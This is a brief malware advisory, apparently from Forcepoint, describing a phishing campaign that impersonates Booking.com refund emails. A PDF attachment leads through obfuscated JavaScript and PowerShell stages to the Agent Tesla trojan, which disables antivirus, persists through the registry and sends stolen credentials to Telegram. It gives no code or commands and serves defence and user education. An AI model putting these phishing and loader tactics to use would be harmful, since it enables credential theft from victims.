Booking.com Impersonation Campaign: Agent Tesla Malware Analysis
Forcepoint has uncovered a sophisticated malware campaign exploiting Booking.com’s brand reputation to deliver Agent Tesla, a versatile remote access trojan (RAT).
The attackers capitalize on trust associated with Booking.com, crafting phishing emails that appear to be legitimate refund notifications. The inclusion of a PDF attachment asks the recipient to check the attached PDF for the card statement.
An email containing a PDF attachment
The malicious PDF utilizes a two-pronged strategy:
- Deceptive Pop-up: Designed to trick users into clicking a fake link or button, leading to the download of a JavaScript payload. This reinforces the illusion of a legitimate process. The downloaded JavaScript file employs heavy obfuscation techniques to hinder analysis and detection. Its primary function is to facilitate the next stage of the attack by downloading the PowerShell script.
- Embedded Code: This triggers the direct download of a PowerShell script, bypassing the need for additional user interaction, and maximizing the campaign’s effectiveness. The centerpiece of the attack, this script is intricately obfuscated to evade security controls. It disables antivirus, modifies registry entries, and establishes persistence. Crucially, it downloads and executes the final Agent Tesla DLL payload.
The culmination of this elaborate scheme is the deployment of the Agent Tesla malware. This adversary embarks on a malicious action to pilfer credentials and personal data, transmitting its ill-gotten gains to a private Telegram chat room. It doesn’t stop there; the malware ensures its persistence through additional PowerShell scripts, continually evolving its tactics to maintain its foothold within the compromised system.
This campaign is a stark reminder of the constant arms race in cybersecurity. Threat tactics grow more refined, mimicking trusted entities and weaponizing everyday file types. Educating users on phishing tactics is paramount. Emphasize the dangers of unsolicited attachments, the importance of verifying sender legitimacy, and the need to use official channels to initiate contact with companies.
